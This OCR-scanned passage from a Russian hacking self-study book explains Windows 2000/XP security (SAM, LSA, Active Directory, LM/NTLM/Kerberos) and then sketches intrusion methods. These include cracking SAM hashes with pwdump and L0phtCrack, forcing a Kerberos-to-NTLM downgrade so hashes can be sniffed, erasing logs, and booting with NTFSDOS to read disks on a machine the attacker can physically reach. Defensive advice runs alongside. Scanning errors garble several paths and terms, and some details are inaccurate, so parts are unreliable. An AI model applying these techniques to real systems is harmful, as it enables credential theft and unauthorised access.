Аутентификация
Аутентификацией называется обеспечение возможности для доказательства одного объекта или субъекта своей идентичности другому объекту или субъекту.
Говоря понятнее, аутентификация — это процедура, подобная установлению
вашей личности, когда вы получаете деньги в сберкассе, покупаете билет на
самолет, регистрируетесь при входе в компьютер и так далее, т.е. доказываете,
что вы — это вы.
Один из способов аутентификации в компьютерной системе состоит во вводе
вашего пользовательского идентификатора, в просторечии называемого «логином» (от английского «log in» — регистрационное имя), и пароля — некой конфиденциальной информации, знание которой обеспечивает владение определенным ресурсом. Получив введенный пользователем логин и пароль, компьютер
сравнивает их со значением, которое хранится в специальной базе данных и,
в случае совпадения, пропускает пользователя в систему.
В компьютерах Windows NT/2000/XP такая база данных называется SAM (Security
Account Manager — Диспетчер защиты учетных записей). База SAM хранит учетные
записи пользователей, включающие в себя все данные, необходимые системе защиты для функционирования. Поэтому взлом базы SAM — одна из самых увлекательных и плодотворных задач хакинга, которую мы описываем в Главе 3 этой книги.
Стоит отметить, что текстовый ввод логина и пароля вовсе не является единственным методом аутентификации. Ныне все большую популярность набирает
аутентификация с помощью электронных сертификатов, пластиковых карт и
биометрических устройств, например, сканеров радужной оболочки глаза.
Также не следует забывать, что процедуру аутентификации применяют компью-

Самоучитель хакера
теры при общении друг с другом, используя при этом весьма сложные криптографические протоколы, обеспечивающие защиту линий связи от прослушивания. А поскольку, как правило, аутентификация необходима обоим объектам,
т.е., например, обоим компьютерам, устанавливающим сетевое взаимодействие,
то аутентификация должна быть взаимной. Иначе, к примеру, покупая товар в не
аутентифицированном Интернет-магазине, вы рискуете потерять (и, как следует
из новостей на эту тему, очень даже с большой вероятностью) свои денежки,
которых, как известно, всегда мало.
В любом случае, для аутентификации в компьютерных системах используются определенные алгоритмы, или, как чаще говорят, протоколы. Сетевые компьютеры
Windows NT 4 для аутентификации друг друга использовали протокол NTLM
(NT LAN Manager — Диспетчер локальной сети NT). Далее NTLM вошел в состав
сетевых средств компьютеров Windows 2000/XP. Протокол NTLM, как и его предшественник, протокол LM (LAN Manager — Диспетчер локальной сети), настолько
хорошо освоен хакерами, что один из способов взлома сетей Windows как раз и состоит в принуждении компьютеров сети аутентифицироваться с помощью NTLM.
В сетях Windows 2000/XP для аутентификации применяется гораздо более совершенный протокол Kerberos, обеспечивающий передачу между компьютерами данных, необходимых для взаимной аутентификации, в зашифрованном
виде. Так что если вы когда-либо регистрировались на компьютере как пользователь домена Windows 2000/XP, то знайте — вы аутентифицируетесь на сервере
Windows 2000 по протоколу Kerberos.
Из всего вышесказанного хакер может сделать вывод — все, что ему нужно для
аутентификации в компьютерной системе Windows 2000/XP — это логин и особенно пароль пользователя. Антихакер, естественно, должен хранить пароль в
полной тайне, поскольку с точки зрения компьютера тот, кто знает ваш логин и
пароль — это вы и никто другой.

Авторизация
После аутентификации пользователя, пытающегося получить доступ к информационным ресурсам, компьютерная система должна проверить, к каким именно ресурсам этот пользователь имеет право обращаться. Данную задачу решает
следующий компонент системы защиты — средства авторизации. Для авторизации пользователей в системах Windows каждому пользователю каждого информационного ресурса, например, файла или папки, определяется набор разрешений доступа. Например, пользователю Васе Пупкину можно разрешить только
чтение важного файла, а Пете Лохову можно разрешить и его модификацию.
Авторизацию не следует путать с аутентификацией, поскольку, например, и
Вася Пупкин, и Петя Лохов оба могут пройти входную аутентификацию, но их
возможности по нанесению системе ущерба могут существенно отличаться.

26

Защита Windows 2000/XP
Чтобы облегчить авторизацию пользователей, в системах Windows NT/2000/XP
разработан набор средств для управления доступом к ресурсам. Эти средства
опираются на концепцию групп пользователей, и суть ее такова. Вместо того,
чтобы для каждого отдельного пользователя устанавливать множество разрешений на доступ к различным ресурсам, эту задачу решают всего один раз для целой группы пользователей. Далее каждый новый пользователь включается в одну из существующих групп и получает те же права, или привилегии на доступ,
которые определены для остальных членов группы. Например, Васю Пупкина
можно включить в группу Гость (Guest), члены которой практически не имеют
никаких прав, а Петю Лохова — в группу Пользователь (User), члены которой
могут открывать и редактировать отдельные документы.
Теперь вам, должно быть, становится ясным, почему следующей задачей хакера
после входной регистрации в системе является расширение привилегий. Без получения прав высокопривилегированной группы, лучше всего группы Администраторы (Administrators), ничего у хакера не выйдет, и останется ему только
одно — «заклеить кулер скотчем» или выключить компьютер при работающем
винчестере, чем и занимаются некоторые странные личности, обитающие в нашем непростом мире…

urn
Ясно, что включенный в гостевую группу Вася Пупкин будет обижен таким
пренебрежением к своей персоне и захочет залезть туда, куда его не пускают.
И вот, чтобы предотвратить его попытки несанкционированного доступа к чужим ресурсам, в системе устанавливают аудит — средства наблюдения за событиями безопасности, т.е. специальная программа начинает отслеживать и фиксировать в журнале события, представляющие потенциальную угрозу вторжения
в систему. В число событий безопасности входят попытки открытия файлов,
входной регистрации в системе, запуска приложений и другие. Так что, если в
системе с установленным аудитом Вася Пупкин попробует открыть файл, не
имея на то разрешений, это событие будет зафиксировано в журнале безопасности, вместе с указанием времени и учетной записи пользователя, вызвавшего
такое событие.
Просматривая журнал безопасности Windows NT/2000/XP, можно определить
очень многое, что позволит идентифицировать хакера, так что одна из важнейших задач хакинга — это очистка журнала безопасности перед уходом. Как это
делается, мы отдельно поговорим в Главе 4, а сейчас сформулируем, что должен
сделать антихакер, чтобы предотвратить все попытки вторжения в систему.
Хорошо организованная защита требует создания политики безопасности, под
которой понимается документ, фиксирующий все правила, параметры, алгоритмы,

27

Самоучитель хакера
процедуры, организационные меры, применяемые организацией для обеспечения компьютерной безопасности.
Например, политика безопасности может включать требование задавать пароли
длиной не менее 11 символов, или обязательный запуск парольной заставки перед кратковременной отлучкой от компьютера, и так далее. Все эти вопросы
достаточно подробно рассмотрены во множестве книг, например, [2], [6], так что
не будем повторяться, а перейдем к более существенным для нас темам — как
работает эта система защиты Windows 2000/XP, и что можно сделать, чтобы она
не работала.

Как работает зашита Windows 2OOO/XP
Работу всей системы защиты Windows 2000/XP обеспечивает служба SRM
(Security Reference Monitor — Монитор защиты обращений). Монитор SRM работает в режиме ядра системы Windows 2000/XP, т.е. невидимо для пользователя.
Однако в системе Windows 2000/XP есть программы, в том числе поддерживающие графический интерфейс, которые позволяют обратиться к различным компонентам монитора SRM. Эти компоненты таковы.
• Диспетчер LSA (Local Security Authority — Локальные средства защиты), проверяющий, имеет ли пользователь разрешения на доступ к системе согласно
политике безопасности, хранимой в специальной базе данных LSA. Иными
словами, диспетчер LSA авторизует пользователей системы согласно принятой политике безопасности. Помимо этого, диспетчер LSA управляет политикой защиты системы и аудитом, а также ведет журнал безопасности.
• Диспетчер SAM (Security Account Manager — Диспетчер учетных записей системы защиты), который поддерживает работу с учетными записями локальных пользователей и групп. Эти учетные записи необходимы для аутентификации пользователей, которые далее авторизуются диспетчером LSA.
• Служба AD (Active Directory — Активный каталог), которая поддерживает базу
данных AD с учетными записями пользователей и групп домена. Эти учетные
записи необходимы для аутентификации пользователей, далее авторизуемых
диспетчером LSA.
• Процедура регистрации, которая получает от пользователя введенный логин
и пароль, после чего выполняет проверку двоякого рода: если при входной
регистрации был указан домен, то контроллеру домена посылается запрос,
причем для связи компьютеров используется протокол Kerberos; если же указан локальный компьютер, то проверку выполняет локальный компьютер.
Вам, наверное, уже стало понятным, как все это работает: процедура регистрации
в диалоге, генерируемом при включении компьютера, предлагает пользователю
28

Защита Windows 2000/XP
ввести свой логин, пароль и указать компьютер/домен, в который он хочет войти.
Далее серверы SAM и AD выполняют аутентификацию пользователя, а сервер
LSA выполняет авторизацию пользователя. Если все прошло нормально, то пользователь входит в систему, и все его действия, т.е. обращения к информационным
ресурсам, контролируются службой SRM.
Это, конечно, чрезвычайно упрощенная модель работы системы защиты
Windows 2000/XP. Однако приведенных данных достаточно, чтобы выявить две
основные уязвимости системы защиты. Во-первых, это наличие баз данных с
паролями пользователей (SAM и AD); во-вторых, это наличие обмена информацией между компьютерами при регистрации пользователя в домене. Посмотрим,
что это нам дает.

SAM
Понятно, что лучше всего искать то, что тебе надо, в местах, которые для этого
отведены по определению. Так что самое лучшее, что может сделать хакер, попав в компьютер, это попробовать взломать доступ к базам SAM и AD, что сразу
обеспечит его паролями доступа ко всем ресурсам компьютера. База SAM хранится в виде файла в каталоге %корневой„каталог%\зу51ет32\сопЛд\5ат, а база
AD — в каталоге %KopHeBoft_KaTanor%\ntds\ntds.dit. Так что, чего, казалось бы,
проще — открыть эти базы данных и прочитать содержимое! Не тут то было.
В стародавние времена, когда любителей чужих секретов было не так много и
они не были такие умные, это и в самом деле было несложно сделать, вернее, не
так сложно, как в системах Windows 2000/XP. Для защиты паролей в базе SAM в
системе Windows NT 4 использовалось слабенькое шифрование паролей, обеспечиваемое протоколом сетевой идентификации NTLM и, к тому же, для обратной
совместимости были оставлены пароли, зашифрованные согласно протоколу
сетевой идентификации LM, который использовался в предыдущих версия
Windows. Шифрование LM было настолько слабо, что пароли в SAM взламывались хакерскими утилитами, например, популярнейшей утилитой LOphtCrack
(http://www.atstacke.com) без всяких затруднений, методом прямого перебора
всех возможных вариантов.
Недостатком первых версий утилиты LOphtCrack было отсутствие инструмента извлечения шифрованных паролей из базы SAM, но с этой задачей успешно справлялась не менее известная программа, запускаемая из командной строки, pwdump
(http://www.atstacke.com). Так что в деле хакинга Windows царила полная гармония — программа pwdump извлекала из базы SAM шифрованные пароли учетных
записей и заносила их в файл, далее этот файл читала программа LOphtCrack, и
путем некоторых усилий — очень небольших, учитывая недостатки протокола
LM — расшифровывала добытые пароли.
29

Самоучитель хакера
Однако все изменилось с появлением Service Pack 3 для Windows NT 4, в котором было реализовано средство, называемое Syskey и представляющее собой
инструмент для стойкого (надежного) шифрования паролей, хранимых в SAM.
При желании пользователь Windows NT 4 мог включить средство Syskey самостоятельно; в системах же Windows 2000/XP шифрование Syskey устанавливается автоматически. В отличие от шифрования LM и NTLM шифрование Syskey
не позволяет выполнять взлом паролей простым перебором, поскольку при использовании паролей достаточной длины это потребует неприемлемых затрат
вычислительных ресурсов. Поэтому единственное, на что осталось надеяться
хакеру — это рассчитывать на недостатки политики безопасности, допускающие
применение пользователями паролей длиной 3-4 символа, а то и вовсе использование в качестве паролей слов из английского языка. Вспомните, мы приводили
в Главе 1 пример недавнего взлома базы данных Microsoft, шифрованной паролем длиной четыре символа — и это в Microsoft!
Так что хакерам пришлось поднапрячься и придумать более изощренные методы взлома системы защиты Windows. Чтобы разобраться в этих методах, давайте
рассмотрим более подробно, как работает эта защита.

Объекты системы зашиты
Как же система Windows 2000/XP управляет всеми этими участниками процесса
аутентификации, авторизации, аудита, в который вовлечены пользователи, компьютеры, группы пользователей с различными правами доступа к информационным
ресурсам? А вот как.
Каждый пользователь, компьютер, учетная запись или группа считаются объектом системы защиты Windows, и каждому такому объекту при его создании
присваивается так называемый идентификатор системы защиты SID (Security
IDentifier), представляющий собой 48-разрядное число, уникальное для всей
компьютерной системы. Каждому компьютеру после установки системы Windows 2000/XP присваивается случайно выбранное значение SID, и каждому домену Windows 2000 после инсталляции также присваивается случайно выбранное уникальное значение SID.
Все объекты системы защиты имеют определенные привилегии доступа к информационным ресурсам. А как же владельцы ресурсов определяют, какому
объекту разрешен доступ к данному конкретному ресурсу, и какой именно доступ? С этой целью для каждого информационного ресурса (файла, папки и т.д.) в
системе Windows задается список ACL (Access Control List — Список управления
доступом), который содержит записи АСЕ (Access Control Entries — Записи
управления доступом). Записи АСЕ содержат идентификаторы SID объектов
системы защиты и их права доступа к данному ресурсу. Списки ACL создаются
самими владельцами информационных ресурсов с помощью средств операционной

30

Защита Windows 2000/XP
системы, например, Проводника (Explorer) Windows, и работа с этими средствами
описана в любом руководстве по операционным системам Windows 2000/XP.
Вот как происходит работа со списками ACL. После регистрации в компьютере
Windows 2000/XP каждый объект (например, пользователь) получает от диспетчера LSA маркер доступа, содержащий идентификатор SID самого пользователя и набор идентификаторов 8Ш всех групп, в которые пользователь входит.
Далее, когда вошедший в систему пользователь обращается к ресурсу, служба
SRM сравнивает его маркер доступа с идентификаторами 8Ш в списке ACL ресурса, и если пользователь имеет право на доступ к ресурсу, то он его получает.
Как видим, все очень «просто», хотя на самом деле наше описание — это верхушка айсберга. Мы однако не будем углубляться в изучение системы защиты,
поскольку все, что нам нужно — это понять, как можно сломать всю эту конструкцию. Путей для этого множество, и их поиском и обустройством для всеобщего блага занято множество весьма квалифицированных людей. Один из самых
напрашивающихся и элегантных способов — это очистка списков ACL всех объектов, после чего система Windows 2000/XP открывается для любых манипуляций. И такие проекты имеются, находясь в стадии активной разработки (например, проект программы МТКар на сайте http://www.rootkit.com). Однако эффективность таких утилит умаляется тем обстоятельством, что доступ к спискам
ACL сам по себе требует административных привилегий!
Раз все так не просто при локальном доступе к компьютеру, то чего можно ожидать от каких-либо путей вторжения, связанных с процессом сетевой идентификации пользователя домена? Ведь при этом по сети передается множество конфиденциальной информации, включая пароли. Обсудим эту задачу, но вначале
рассмотрим, из чего состоит сеть компьютеров Windows 2000/XP.

Активный каталог
ЕСЛИ основой построения сети компьютеров Windows NT 4 были домены, т.е.
группы компьютеров под управлением контроллера, то сети Windows 2000/XP
структурируются и управляются с помощью служб активного каталога ADS
(Active Directory Services). Службы ADS устанавливаются и управляются средствами серверов Windows 2000, и выполняемые при этом процедуры описаны в
руководствах по использованию систем Windows 2000 Server. Мы не будем повторять их содержимое, а просто постараемся указать, что интересного может
найти хакер во всех этих активных каталогах.
Все компоненты компьютерной сети — компьютеры, пользователи, ресурсы,
службы, учетные записи — для службы ADS являются объектами, свойства которых определяются с помощью атрибутов, т.е. параметров различного назначения. Например, объект учетная запись имеет атрибут имя пользователя, а
объекты компьютер имеют атрибут IP-адрес компьютера в локальной сети.

31

Самоучитель хакера
Для удобства управления этими объектами в ADS используются объекты, называемые контейнерами, задача которых — хранить в себе остальные объекты, в
том числе контейнерные. К контейнерным объектам относятся организационные
единицы OU (Organization Units), которые могут включать в себя пользователей,
группы, компьютеры, принтеры, приложения, политики системы защиты, общие
файлы и папки, плюс другие OU. Назначение OU — упростить администрирование компьютерной сети путем разделения ее на части с разными характеристиками, т.е. можно поместить в отдельные OU различные компьютеры и пользователей, после чего настроить работу этих OU с учетом содержимого.
Для организации сети компьютеров Windows 2000/XP они могут объединяться в
логические единицы, называемые доменами. Каждый домен управляется контроллерами домена, хранящими общую для домена информацию и выполняющими централизованную авторизацию подсоединяющихся пользователей. В домене
Windows 2000 контроллеров может быть несколько, и все они — равноправны, что
отличает домен Windows 2000 от домена Windows NT. Таким образом, компьютеры одного домена совместно используют единую базу учетных записей, и вошедший в домен пользователь имеет доступ ко всем общим ресурсам домена.
Для структурирования компьютерной сети домены Windows 2000/XP могут быть
объединены в деревья, а деревья могут быть объединены в лес. Таким образом,
вся сеть организации может состоять из доменов отделов, и при этом каждый
домен будет иметь собственное имя и контроллер. Между всеми доменами деревьев и лесов организуются двусторонние доверительные отношения, т.е. входящие в один домен компьютеры могут получать доступ к компьютеру из другого домена в лесу или дереве.
Преимущество использования такой модели состоит в возможности структурирования имен сетевых компьютеров, которые должны соответствовать их положению в лесу доменов. Допустим, у нас имеется домен с именем domen. Тогда
компьютеры домена именуются так: com*!.domen, comp2.domen… А теперь
допустим, что в сети имеется множество доменов, и каждый домен имеет свое
имя, допустим, domenl, domen2,… Чтобы организовать дерево доменов, создается несколько ветвей, и к имени каждого домена в ветви слева приписывается
имя смежного с ним домена в направлении от корня дерева.
Например, если domenl и domen2 входят в одну ветвь, причем domen2 «вырастает» из domenl, то компьютеры из domen2 будут именоваться comp1.domen2.domenl, comp2.domen2.domen1, … compN.domen2.domen1. А чтобы организовать
из двух доменов domenl и domen2 лес, имеющий имя forest, то его имя добавляется справа от имени домена. Таким образом, компьютеры в domenl будут именоваться compl.domenl.forest, comp2.domen1.forest , а в domen2 компьютеры
будут именоваться как compl.domen2.forest, comp2.domen2.forest, …. Между
всеми доменами леса устанавливаются двусторонние доверительные отношения.

32

Защита Windows 2000/XP
В общем, вся эта возня с доменами — занятие для системных администраторов, для
хакера тут интересно вот что: права доступа к ресурсам доменов леса или дерева
для различных учетных записей зависят от их членства в трех основных группах.
• Универсальная группа (Universal group), членами которой могут быть пользователи всего леса, и следовательно, членство в универсальной группе предоставляет доступ к компьютерам всего леса.
• Глобальная группа (Global Group), членами которой могут быть только
пользователи одного домена, соответственно, членство в глобальной группе
предоставляет доступ к ресурсам всего домена.
• Локальные группы домена (Local group domain), членами которой могут
быть пользователи всего леса, но локальные группы могут быть использованы только для управления доступом к ресурсам одного домена.
Именно эти группы следует указывать в списках ACL для задания прав доступа
к информационным ресурсам. Теперь хакеру все становится понятным — для
взлома сети лучше всего получить права члена универсальной группы. А для
этого можно, например, взломать базу AD, либо перехватить в сети пароль при
регистрации пользователя на контроллере домена, либо проделать еще какуюлибо штучку, коими переполнены новости с фронта виртуальных сражений.
Вообще-то база AD устроена наподобие SAM, так что для нее справедливы все
те слова, что сказаны ранее про шифрование и взлом паролей в SAM. Однако
взлом AD затруднен тем обстоятельством, что размер AD, как правило, весьма
велик (до 10 Мб), и база AD хранится на серверах, которые, чаще всего, защищены на порядок лучше клиентских компьютеров. Таким образом, наиболее оптимальной стратегией хакера может быть проникновение в клиентский компьютер с последующими попытками взлома контроллеров домена. Для этого можно,
скажем, с помощью снифера перехватить пароли и логины, необходимые для
входа пользователя в домен Window 2000, во время их передачи по сети на контроллер домена. Такие программы существуют, например, последняя версия LC4
программы LOpghtCrack снабжена эффективным механизмом перехвата и сетевых пакетов с целью последующего взлома паролей.
Мы еще поговорим про эту в высшей степени полезную программу, но пока рассмотрим поподробнее, как происходит процедура сетевой идентификации пользователей — там имеются и еще кое-какие интересные возможности.

Регистрация Ъ домене Windows 2000
При регистрации пользователя в домене Windows 2000 используется процедура
запроса с подтверждением, означающая следующее. Вначале контроллер домена передает клиентскому компьютеру запрос — случайное число, для которого
33
2 — 5830

Самоучитель хакера
клиент подсчитывает значение одной очень важной криптографической функции, называемой хэш-функцией, или просто хэшем, используя при этом пароль
пользователя в качестве аргумента. Что такое хэш-функция, вы можете прочесть, например, в [7], здесь же ограничимся лишь указанием, что все хэшфункции имеют следующее характерное свойство. Настоящую хэш-функцию
очень просто вычислить по значению аргументов, но вот наоборот, вычислить
значения аргументов по значению хэш-функции почти невозможно, поскольку это
требует нереальных вычислительных ресурсов. Вот что это дает системе защиты.
Подсчитанную хэш-функцию клиент передает обратно контроллеру домена, и
контроллер снова подсчитывает эту же хэш-функцию для тех же аргументов переданного клиенту значения случайного числа и пароля пользователя, который хранится в базе AD. Если оба значения хэш-функции совпадают — пользователь аутентифицирован, поскольку такого совпадения практически невозможно
достичь без знания аргументов — такова природа хэш-функции. Преимущества
такой аутентификации очевидны — пароль по сети не передается, а использование
случайного числа гарантирует невозможность повторных использований перехваченных запросов и ответов для прохождения сетевой регистрации.
Для хакера все эти криптографические штучки весьма интересны в следующем
отношении. Во-первых, при такой сетевой аутентификации по сети передаются
всего лишь значения хэш-функции пароля. Во-вторых, даже поверхностного
знания криптографии достаточно для уяснения факта, что восстановление пароля по значению хэш-функции невозможно только практически, но теоретически
это возможно, хотя бы методом прямого перебора или, как говорят в криптографии, методом «грубой силы».
Объем вычислений, необходимый для взлома пароля, определяет крттостойкость, т.е надежность протокола сетевой аутентификации. И вот тут-то и возникает большая дыра, в которую пролезло немало шустрых личностей, которые,
исследовав методы шифрования протокола LM, пришли к выводу — взлом протокола LM вполне возможен вследствие некой грубой криптографической
ошибки (подробности можно узнать, к примеру, в [3]). Для исправления ситуации Microsoft выпустила гораздо более защищенный протокол NTLM (в Service
Pack 3 для Windows NT 4) и протокол NTLMv2 (в Service Pack 4 для Windows NT 4).
И, наконец, в Windows 2000 появился протокол Kerberos, который стал первым
по-настоящему стойким протоколом сетевой идентификации, призванным
обезопасить сетевое взаимодействие компьютеров в процессе идентификации.
Однако не тут то было.
Дело в том, что в системах Windows 2000/XP для обеспечения обратной совместимости со старыми системами Windows поддерживаются все предыдущие версии протоколов, включая LM. И если компьютеры Windows 2000/XP не в состоянии идентифицировать друг друга по протоколу Kerberos, они автоматически переходят на использование ненадежных протоколов NTLM или LM.
34

Защита Windows 2000/XP
Так что хакеры действуют следующим образом — они блокируют специально
сформированными сетевыми пакетами TCP-порт 88 контроллера домена, используемый Kerberos, и вынуждают компьютеры переходить на старые версии
протоколов аутентификации. Дальнейшее понятно без объяснения — с помощью
снифера перехватываются пакеты с паролями для идентификации по протоколам LM или NTLM, после чего с помощью утилиты LOphtCrack выполняется
взлом пароля.
Таким образом, положение антихакера выглядит безнадежным — кажется, что
нет никакой возможности отбиться от хакерских попыток взлома компьютерной
сети. И в самом деле, что может сделать антихакер?

Антихакинг
Для защиты от столь хитроумных любителей чужих секретов прежде всего требуется создать эффективную политику безопасности, которая, помимо прочего,
включала бы меры по ограничению физического доступа к компьютеру. Следует
четко уяснить, что если хакер получит локальный доступ к компьютеру, то рано
или поздно все содержащиеся в нем конфиденциальные данные будут раскрыты.
Если компьютер подсоединен к сети, то следующим шагом хакера будет взлом
сетевых серверов. Как вы, наверное, уже поняли, возможностей у него будет
предостаточно.
Выработка политики безопасности и настройка системы защиты компьютера
должна производиться постепенно, по мере накопления информации о возможных
угрозах и опыта по их парированию. Однако с самого начала эксплуатации системы можно применить средство обеспечения безопасности компьютера, называемое шаблонами безопасности, впервые появившимися в системах Windows 2000.
Эти шаблоны представляют собой целые наборы параметров системы защиты,
подготовленные Microsoft для всеобщего использования, и включающие настройки политики безопасности для автономного компьютера, рабочей станции
и контроллера домена. В системах Windows XP шаблоны безопасности получили
дальнейшее развитие и обеспечивают достаточно надежную защиту от широко
распространенных атак компьютеров Windows.
Установка и настройка этих шаблонов подробно описана в справочной системе
Windows 2000/XP или в книге [7], так что не будем повторяться. Начав с установки шаблона безопасности, далее можно постепенно уточнять эти настройки,
создав собственную базу данных системы защиты, отражающую ваш личный
опыт работы с системой. Прочность своей защиты можно проверять с помощью
сканеров безопасности, например, приложения Retina, о работе с которым можно прочитать в книге [7].

35

Самоучитель хакера
Наилучшим же техническим решением защиты от сетевых атак методом перехвата трафика является во-первых, отказ от использования старых версий протоколов аутентификации. Во-вторых, следует прибегнуть к технологиям криптографической защиты, в частности, к построению сети VPN (Virtual Private
Network — Виртуальная частная сеть). Технология VPN заранее предполагает,
что кабельная система сети не защищена от хакерских вторжений и все передаваемые данные могут быть перехвачены. Поэтому весь сетевой трафик VPN
шифруется надежными алгоритмами, исключающими или сильно затрудняющими перехват расшифровки данных.
Все эти старания, конечно, не пропадут даром, однако, как говорит известный
специалист по криптографии Брюс Шнайер (Bruce Schneier), автор бестселлера
«Прикладная криптография» (Applied Cryptography), безопасность — это процесс.
Нет такого метода защиты, который сможет раз и навсегда обезопасить компьютерную систему — схватка хакера и антихакера не прекратится никогда, по
крайней мере, в обозримом будущем этого точно не произойдет. Так что в следующей главе мы познакомимся с первым эпизодом этой Великой Виртуальной
Войны — локальным вторжением в компьютер, т.е. наиболее эффективным и
полноценным способом взлома системы.

Заключение
В этой главе вы познакомились со средствами обеспечения безопасности
Windows 2000/XP и узнали о «болевых точках» системы защиты, которые используются хакерами для выполнения наиболее широко распространенных атак.
Теперь вас не смутят аббревиатуры SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
и так далее. Введенные здесь термины и обозначения будут использоваться
при описании орудий взлома систем Windows, к которым мы переходим со
следующей главы. Желающие углубить свои познания в сфере средств защиты
Windows 2000/XP, сетей ТСР/ГР и служб ADS могут обратиться к большому числу прекрасных литературных источников, из которых можно выделить серию
книг Microsoft Press по серверам Windows 2000.

36

ГЛАВА 3

Прсжикио&еиые Ъ систему
Познакомившись в предыдущей главе с системой защиты Window 2000/XP, вы,
наверное, уже задались вопросом, а как же можно обойти все «ЗА» навороченных средств обеспечения безопасности, которые создавало большое число квалифицированных специалистов? Все зависит от обстоятельств, и в Главе 2, где
были перечислены возможные пути вторжения в компьютер, первым в списке
стояло локальное вторжение, когда хакер получает физический доступ к консоли
управления компьютерной системы, что обеспечивает ему наибольшее число возможностей хакинга. Вот с него мы и начнем. (Только не подумайте, что вас будут
учить лазить в форточку или обшаривать помойки — для этого вы можете обратиться к Интернету. Здесь же мы ограничимся компьютерными технологиями.)
Вообще-то возможность такого вторжения в наибольшей степени обуславливается ненадлежащим выполнением правил политики безопасности организации, а
то и полным ее отсутствием. Ныне вполне заурядна ситуация, когда к компьютерной сети неведомо кем и как подключено множество компьютеров, а политика информационной безопасности сводится к листочку со списком паролей,
приклеенным к монитору (потом их выбрасывают на помойку — ну и…).
Так что для получения локального доступа к компьютеру хакеру может и не потребоваться орудовать отмычками, лазить через забор или в открытую форточку, чтобы попасть в помещение с компьютерами. После чего, пройдя все испытания, бедный хакер, подсвечивая себе фонариком и пугливо озираясь, должен
заняться выкручиванием винчестера для последующего исследования, или пытаться войти в компьютерную систему, поминутно рискуя быть схваченным и
посаженным за решетку (поскольку все это — чистейшей воды уголовщина).
Неужели все так страшно? Да нет же, нет — чаще всего нужно просто протянуть
руку и сорвать плод, висящий над головой. Во многих случаях свободный доступ к компьютерному оборудованию — вещь достаточно обычная.
Итак, хакер сел за рабочий стол с компьютером и приступил к работе. Первое,
что ему следует сделать — это войти в систему под учетной записью с высокими
привилегиями, лучше всего — администратора системы. Тут существуют варианты, и мы их постараемся рассмотреть.
Во-первых, вполне возможна ситуация, когда и делать-то ничего не надо — сотрудник Вася Пупкин вышел на перекур и надолго застрял в курительной комнате за обсуждением вчерашнего футбольного матча, а его компьютер отображает на экране окно проводника Windows. Это вполне реально, как и то, что на
мониторе может быть приклеен листочек со списком паролей доступа, и каждый
пользователь — как минимум член группы опытных пользователей, которым
разрешена установка программ и доступ почти ко всем ресурсам компьютера.
И чего тут удивляться, что, рано или поздно, все такие системы попадают в лапы

Самоучитель хакера
типов наподобие доктора Добрянского (см. Главу 1), а уж они-то найдут чем там
заняться, мало не покажется. Описанная ситуация — это полный хаос в политике
безопасности организации, и, повторяем, таких организаций — полным-полно.
Во-вторых, в более благополучных организациях на экране покинутых компьютеров может светиться заставка, защищенная паролем, или же при попытке входа хакеру отображается приглашение на ввод пароля системы Windows или системы BIOS компьютера. Тогда хакеру для входа в компьютер придется поработать с системой защиты, и один из путей получения доступа к ресурсам компьютера Windows 2000/XP состоит в загрузке системы со съемного носителя.

со съемного носителя
ЕСЛИ вход в компьютерную систему закрыт паролем доступа, то хакер может
попытаться загрузить систему со съемного носителя — дискеты или компактдиска (естественно, при наличии дисководов). Чего, казалось бы, проще — вставляй загрузочную дискету с системой MS-DOS в дисковод и включай компьютер!
Однако подождите с выводами — все не так просто, и тут есть свои подводные
камни. Во-первых, загрузка системы со съемного носителя может быть запрещена настройкой параметров BIOS системы, а доступ к параметрам BIOS закрыт
паролем. Эту ситуацию мы рассмотрим в следующем разделе.
Во-вторых, даже если загрузка со съемного носителя в BIOS разрешена, то вы
можете столкнуться с проблемой доступа к файловой системе NTFS, поддерживаемой только системами Windows 2000/XP. Таким образом, после загрузки системы MS-DOS вы просто-напросто не увидите жесткого диска — вожделенного
хранилища информации, из-за которого все и было затеяно.
Конечно, можно быстро-быстро, потея и озираясь по сторонам, вывинтить жесткий диск и убежать (автор категорически не советует — если поймают — все, и
надолго! И потом, как говаривал О. Бендер, все это «низкий сорт, грязная

работа»),
чтобы потом спокойно исследовать его содержимое на своем компьютере
Windows 2000/XP. Но более квалифицированный хакер поступит иначе — он
прибегнет к утилите NTFSDOS Professional (http://www.winternals.com) компании Winternals Software LP, которая позволяет получить доступ к дискам NTFS
из системы MS-DOS. Помимо всего прочего, эта утилита чрезвычайно полезна
при порче операционной системы, утрате пароля входа в Windows 2000/XP и в
других случаях. Так что эта утилита полезна обоим участникам виртуальной
битвы — и хакеру, и антихакеру. Поэтому опишем работу с утилитой NTFSDOS
Professional — она это заслужила.

38

Проникновение в систему

Утилита М1Т51Ю5 fro
Применение утилиты NTFSDOS Pro заключается в следующем. После инсталляции программы в главном меню Windows создается папка NTFSDOS Professional
с командой вызова мастера NTFSDOS Professional Boot Disk Wizard (Мастер
загрузочных дисков NTFSDOS Professional). Запуск этого мастера создает загрузочную дискету или жесткий диск, который может быть использован для работы
с томами NTFS. Опишем работу мастера по шагам.
Перед началом работы вы должны создать две загрузочные дискеты, воспользовавшись командами FORMAT/S или SYS системы
MS-DOS. Или же можно создать эти дискеты с помощью команды
форматирования Windows XP с установленным флажком Create an
MS-DOS startup disk (Создать загрузочную дискету MS-DOS).
> Выберите команду главного меню Пуск * Программы » NTFSDOS Professional
(Start » Programs » NTFSDOS Professional). На экране появится диалог с приветствием (Рис. 3.1).

wizard will help you install V/indows NT/200DvXP system files needed
NTFSDOS Professional to run from a MS-DOS diskette or hard disk

PMC. 3.1. Приветственный диалог мастера установки NTFSDOS Pro
> Щелкните мышью на кнопке Next (Далее). На экране появится следующий диалог (Рис. 3.2), в котором отображается напоминание о необходимости иметь под
рукой две загрузочные дискеты, о которых мы уже упоминали чуть выше.
> Если у вас имеются загрузочные дискеты, то нажмите кнопку Next (Далее),
иначе займитесь созданием этих дискет.
По умолчанию NTFSDOS Pro использует версию набора символов MS DOS для
США (кодовая страница 437). В отобразившемся третьем диалоге мастера
(Рис. 3.3) предлагается выбрать дополнительный набор символов.

39

Самоучитель хакера

NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows
NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
«Format» option from the context menu of your diskette drive, and formatting a diskette with the «Create
an MS-DOS startup disk» option checked.

< Back

Next >

Cancel

J

Рис. З.2. Диалог с предупреждением о необходимости
иметь системные дискеты

